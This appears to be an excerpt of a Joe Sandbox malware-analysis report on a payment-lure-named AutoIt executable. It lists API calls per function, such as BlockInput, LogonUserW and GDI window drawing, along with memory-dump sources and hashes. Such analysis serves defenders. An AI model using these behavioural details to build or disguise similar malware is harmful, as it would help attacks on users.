                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Proc
                                                                      • String ID:
                                                                      • API String ID: 2346855178-0
                                                                      • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                      • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                      • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                      • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                      APIs
                                                                      • BlockInput.USER32(00000001), ref: 0045A38B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: BlockInput
                                                                      • String ID:
                                                                      • API String ID: 3456056419-0
                                                                      • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                      • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                      • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                      • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                      APIs
                                                                      • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: LogonUser
                                                                      • String ID:
                                                                      • API String ID: 1244722697-0
                                                                      • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                      • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                      • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                      • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                      APIs
                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: NameUser
                                                                      • String ID:
                                                                      • API String ID: 2645101109-0
                                                                      • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                      • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                      • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                      • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                      • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                      • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                      • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: N@
                                                                      • API String ID: 0-1509896676
                                                                      • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                      • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                      • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                      • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                      • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                      • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                      • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                      • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                      • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                      • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                      • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                      • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                      • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                      • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                      • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                      • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction ID: f457ed30843a2a735df89a2f0b4e983c2ed54773d1622d6d4779f40ee0fd6586
                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction Fuzzy Hash: 2C41A271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction ID: 45c27313cb465f1373b186660bb31a434a1c385367659cbb1da72ec043b0d8f8
                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction Fuzzy Hash: 32019678A11209EFCB44DF99C6909ADF7B5FB49310F6086D9D819A7341D730AE52DB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction ID: 2718836cbd698e58549c494c9b0ee54eeb9c11a1842615f6d0ce607240cd7139
                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction Fuzzy Hash: 1D019279A10249EFCB44DF99C6909AEF7B5FB49310F6086D9D819A7341E730AE42DB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                      APIs
                                                                      • DeleteObject.GDI32(?), ref: 0045953B
                                                                      • DeleteObject.GDI32(?), ref: 00459551
                                                                      • DestroyWindow.USER32(?), ref: 00459563
                                                                      • GetDesktopWindow.USER32 ref: 00459581
                                                                      • GetWindowRect.USER32(00000000), ref: 00459588
                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                      • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                      • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                      • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                      • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                      • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                      • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                      • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                      • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                      • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                      • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                      • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                      • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                      • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                      • _wcslen.LIBCMT ref: 00459916
                                                                      • _wcscpy.LIBCMT ref: 0045993A
                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                      • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                      • GetDC.USER32(00000000), ref: 004599FC
                                                                      • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                      • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                      • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                      • API String ID: 4040870279-2373415609
                                                                      • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                      • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                      • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                      • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                      APIs
                                                                      • GetSysColor.USER32(00000012), ref: 0044181E
                                                                      • SetTextColor.GDI32(?,?), ref: 00441826
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                      • GetSysColor.USER32(0000000F), ref: 00441849
                                                                      • SetBkColor.GDI32(?,?), ref: 00441864
                                                                      • SelectObject.GDI32(?,?), ref: 00441874
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                      • GetSysColor.USER32(00000010), ref: 004418B2
                                                                      • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                      • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                      • DeleteObject.GDI32(?), ref: 004418D5
                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                      • FillRect.USER32(?,?,?), ref: 00441970
                                                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                        • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                        • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                        • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                        • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                        • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                        • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                        • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                        • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                        • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                      • String ID:
                                                                      • API String ID: 69173610-0
                                                                      • Opcode ID: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                                                                      • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                      • Opcode Fuzzy Hash: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                                                                      • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                      APIs
                                                                      • DestroyWindow.USER32(?), ref: 004590F2
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                      • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                      • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                      • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                      • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
